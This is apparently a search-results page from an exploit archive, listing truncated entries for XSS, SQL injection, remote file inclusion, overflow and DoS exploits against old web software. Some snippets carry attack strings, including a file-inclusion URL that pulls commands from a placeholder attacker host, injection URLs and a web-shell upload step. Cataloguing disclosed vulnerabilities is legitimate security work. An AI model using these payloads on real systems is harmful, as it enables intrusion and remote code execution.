11967 matches found
Dominant Creature BBG/RPG Browser Game Persistent XSS
No description provided by source. =================================================================================== Dominant Creature BBG/RPG browser game XSS vulnerabilities =================================================================================== Exploit Title: Dominant Creature...
Front Accounting 2.3RC2 Multiple SQL Injection Vulnerabilities
No description provided by source. Advisory Name: Multiple SQL Injections in Front Accounting Internal Cybsec Advisory Id: 2010-1003-Multiple SQL Injections in Front Accounting Vulnerability Class: SQL Injection Affected Applications: Front Accounting v2.3RC2; other versions may also be affected...
Joomla com_quran SQL Injection vulnerability
No description provided by source. ! ===========================================================================! Joomla comquran SQL Injection vulnerability Author : r3m1ck [email protected] Homepage : http://www.indonesiancoder.com , http://r3m1ck.us Date : 31 May, 2010 location : Indonesi...
F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'json' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClien...
PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion Vulnerability
No description provided by source. pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...
Centreon IT & Network Monitoring 2.1.5 - Injection SQL
No description provided by source. !/usr/bin/perl //--------PoC---------// Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL Version : 2.1.5 Author : Jonathan Salwan [email protected] Vuln sql injection http://localhost/centreon/main.php?p=201&hostid=-1%20SQL Injection&o=p&min=1...
virtue news (sql/xss) Multiple Vulnerabilities
No description provided by source. Viva l'Algérie 3-1 ---Karim Matmour--Abdel-Kader Ghazal--Rafik al-Zuhair Jabbur-- Félicitations à tous les Algériens L'Algérie bat l'Egypte 3-1 à aller El akouba pour le retour -------------------------AllaH AkbaR------------------------------- Virtue News...
MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit
No description provided by source. / c0ntex open-security org / include errno.h include stdio.h include stdlib.h include string.h include unistd.h include arpa/inet.h include netinet/in.h include sys/types.h include sys/socket.h define SUCCESS 0 / True / define FAILURE 1 / False / define ABANNER...
Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class CyberfolioRemoteFileIncludePOCBase: vulID = '64221' version = '1' vulDate = '2006-11-06' author = ' '...
SpeedBerg <= 1.2beta1 (SPEEDBERG_PATH) File Include Vulnerabilities
No description provided by source. speedberg = 1.2beta1 Remote File Inclusion Download Source : http://www.myepfl.ch/speedberg/files/speedberg-1.2beta1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net file; entrancePage.tpl.php generalToolBox.tlb.php...
Php Blue Dragon CMS 3.0.0 - Remote SQL Injection Exploit
No description provided by source. ? // Exploit Name: Php Blue Dragon CMS 3.0.0 Remote SQL Injection Exploit //Script Homepage: http://phpbluedragon.pl/ // Autor: Kacper [email protected] // Autor Homepage: devilteam.eu | kacper.bblog.pl //Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na...
IPNPro3 <= 1.44 - Admin Password Changing Exploit
No description provided by source. ?php / ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || ||...
2daybiz Template Monster Clone (edituser.php) Change Pass Exploit
No description provided by source. title Template Monster Clone Change Password /title /head head /head body bgcolor=000000 pfont size=6 color=FF0000a href=http://www.2daybiz.com/ font color=FF00002daybiz/font/a Template Monster Clone /font/p TABLE border=0 width=780 align=center TR TDTABLE...
Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC
No description provided by source. !/usr/bin/perl Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability Took Damian Put's poc and shortened it just a little. All credits to Damian Put pucikatgazeta.pl [email protected] www.overflow.pl /str0ke my $clam =...
pre multi-vendor shopping malls Multiple Vulnerabilities
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= IN THE NAME OF ALLAH -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Pre...
PHP Support Tickets 2.2 - Remote File Upload Vulnerability
No description provided by source. remote file upload script: PHPSupportTicketsv2.2 download from:http://www.phpsupporttickets.com/modules/phpsupporttickets.com/dist/free/PHPSupportTicketsv2.2.zip 1:www.site.com/path/index.php?page=register 2:New Ticket 3:upload php file shell...
openEngine 2.0 100226 LFI and XSS Vulnerabilities
No description provided by source. SecPod Technologies www.secpod.com Title : openEngine Local File Inclusion and XSS Vulnerabilities Vendor : http://www.openengine.de Advisory : http://secpod.org/blog/?p=152 http://secpod.org/advisories/SECPODOpenengineLFIXSSVuln.txt Version : openEngine 2.0...
Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability
novalib/class.novaEdit.mysql.php 代码中对TNLIBDIR变量校验不严格。 利用方法: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63860' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-21'...
Drupal <= 4.7 (attachment mod_mime) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo Drupal = 4.7 attachment modmime poc exploit\r\n; echo by rgod [email protected]\r\n; echo site: http://retrogod.altervista.org\r\n\r\n; / this works with a user account with upload rights and with permissions to modify...
Php-Stats 0.1.9.2 - Multiple Vulnerabilities Exploit
No description provided by source. ?php / Php-Stats 0.1.9.2 Multiple Vulnerabilities Exploit Blind SQL Injection / Remote Code Execution P.o.C. author...: EgiX mail.....: n0b0d13satgmaildotcom link.....: http://php-stats.com/downloads details..: works with magicquotesruntime = off 1 Blind SQL...